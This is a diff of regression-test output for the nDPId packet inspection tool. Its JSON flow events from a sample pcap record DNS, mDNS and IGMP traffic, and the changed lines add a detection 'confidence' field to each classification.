-00770{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1626168075664,"flow_last_seen":1626168075665,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1626168075665,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"139.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00770{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168075664,"flow_last_seen":1626168075675,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1626168075675,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"139.1.168.192.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00770{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1626168075664,"flow_last_seen":1626168075681,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1626168075681,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"60.21.149.52.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1626168075664,"flow_last_seen":1626168075665,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1626168075665,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"139.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168075664,"flow_last_seen":1626168075675,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1626168075675,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"139.1.168.192.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1626168075664,"flow_last_seen":1626168075681,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1626168075681,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"60.21.149.52.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1626168075993,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1626168075993,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"ts_msec":1626168075993,"pkt":"AQBeAAD76qnehSPOCABFAAB0G+EAAP8R\/GjAqAGL4AAA+xTpFOkAYH4FAAAAAAACAAAAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMgAEIX2hvbWVraXTAHAAMgAEAACkFoAAAEZQAEgAEAA4Aumq\/a01YO+qp3oUjzg=="}
-00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1626168075993,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
+00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1626168075993,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1626168075993,"l3_proto":"ip6","src_ip":"fe80::1059:a858:f9e7:cf94","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1626168075993,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":150,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":150,"pkt_l4_len":96,"ts_msec":1626168075993,"pkt":"MzMAAAD76qnehSPOht1gCggAAGAR\/\/6AAAAAAAAAEFmoWPnnz5T\/AgAAAAAAAAAAAAAAAAD7FOkU6QBgoIcAAAAAAAIAAAAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAyAAQhfaG9tZWtpdMAcAAyAAQAAKQWgAAARlAASAAQADgC6ar9rTVg76qnehSPO"}
-00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1626168075993,"l3_proto":"ip6","src_ip":"fe80::1059:a858:f9e7:cf94","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
+00704{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1626168075993,"l3_proto":"ip6","src_ip":"fe80::1059:a858:f9e7:cf94","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076015,"flow_last_seen":1626168076015,"flow_idle_time":180000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"ts_msec":1626168076015,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00903{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1626168076015,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"ts_msec":1626168076015,"pkt":"6qnehSPO8BiYFWV8CABFAAFxqZwAAP8RjIrAqAF5wKgBixTpFOkBXfEmAACEAAAAAAEAAAAFD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUAAgFTUJQcm\/ADMAyACGAAQAAAHgADgAAAADN8QVNQlByb8AhwDIAEIABAAARlAB3EXJwSE49ZWYzZjBmMDE0OThlDHJwRmw9MHgyMDAwMApycFZyPTIxMC40EXJwSEE9NjM4Y2VmMTVmYTJiEXJwQUQ9YzJlYTRjNWFjZmVlEXJwSEk9MmRiM2M5NTVjZDgyFnJwQkE9NTM6REQ6Qjk6MDY6QjU6MDAFTUJQcm8MX2RldmljZS1pbmZvwBwAEAABAAARlAAzFG1vZGVsPU1hY0Jvb2tQcm8xNCwxCm9zeHZlcnM9MjASZWNvbG9yPTIyNSwyMjUsMjIzwEwAHIABAAAAeAAQ\/oAAAAAAAAAIKbjnNzdtvsBMAAGAAQAAAHgABMCoAXk="}
-00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076015,"flow_last_seen":1626168076015,"flow_idle_time":180000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"ts_msec":1626168076015,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
+00701{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076015,"flow_last_seen":1626168076015,"flow_idle_time":180000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"ts_msec":1626168076015,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
 00546{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1626168076607,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"ts_msec":1626168076607,"pkt":"AQBeAAAC6qnehSPOCABGAAAgeZkAAAECCQnAqAGL4AAAApQEAAAXAAgE4AAA+w=="}
-00579{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1626168076607,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"ts_msec":1626168076607,"pkt":"AQBeAAD76qnehSPOCABGAAAgaRwAAAECGI3AqAGL4AAA+5QEAAAWAAkE4AAA+w=="}
-00581{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1626168077017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":150,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":150,"pkt_l4_len":116,"ts_msec":1626168077017,"pkt":"AQBeAAD76qnehSPOCABFAACI8IoAAP8RJ6vAqAGL4AAA+xTpFOkAdC8RAAAAAAACAAEAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEIX2hvbWVraXTAHAAMAAHADAAMAAEAABGUAAgFTUJQcm\/ADAAAKQWgAAARlAASAAQADgC6ar9rTVg76qnehSPO"}
 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1626168077017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":170,"pkt_l4_len":116,"ts_msec":1626168077017,"pkt":"MzMAAAD76qnehSPOht1gCggAAHQR\/\/6AAAAAAAAAEFmoWPnnz5T\/AgAAAAAAAAAAAAAAAAD7FOkU6QB0UZMAAAAAAAIAAQAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAwAAQhfaG9tZWtpdMAcAAwAAcAMAAwAAQAAEZQACAVNQlByb8AMAAApBaAAABGUABIABAAOALpqv2tNWDvqqd6FI84="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077413,"flow_last_seen":1626168077413,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1626168077413,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1626168077413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1626168077413,"pkt":"WNVuaKQA8BiYFWV8CABFAABAe7EAAEARLMvAqAF5CAgICNkPADUALCfrXeUBAAABAAAAAAAABHdkY3AJbWljcm9zb2Z0A2NvbQAAQQAB"}
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077413,"flow_last_seen":1626168077413,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1626168077413,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077413,"flow_last_seen":1626168077413,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1626168077413,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077415,"flow_last_seen":1626168077415,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1626168077415,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1626168077415,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1626168077415,"pkt":"WNVuaKQA8BiYFWV8CABFAABA7DEAAEARvErAqAF5CAgICNJ8ADUALMmVww0BAAABAAAAAAAABHdkY3AJbWljcm9zb2Z0A2NvbQAAAQAB"}
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077415,"flow_last_seen":1626168077415,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1626168077415,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077415,"flow_last_seen":1626168077415,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1626168077415,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1626168077439,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1626168077439,"pkt":"8BiYFWV8WNVuaKQACABFAAC9hRIAAHgR6uwICAgIwKgBeQA10nwAqSezww2BgAABAAMAAAAABHdkY3AJbWljcm9zb2Z0A2NvbQAAAQABwAwABQABAAANmgAfCndkLXByb2QtY3AOdHJhZmZpY21hbmFnZXIDbmV0AMAwAAUAAQAAARUANhh3ZC1wcm9kLWNwLWV1LW5vcnRoLTItZmULbm9ydGhldXJvcGUIY2xvdWRhcHAFYXp1cmXAG8BbAAEAAQAAAAQABChxCi8="}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077415,"flow_last_seen":1626168077439,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1626168077439,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.113.10.47"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077415,"flow_last_seen":1626168077439,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1626168077439,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.113.10.47"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077441,"flow_last_seen":1626168077441,"flow_idle_time":180000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":73,"midstream":0,"ts_msec":1626168077441,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
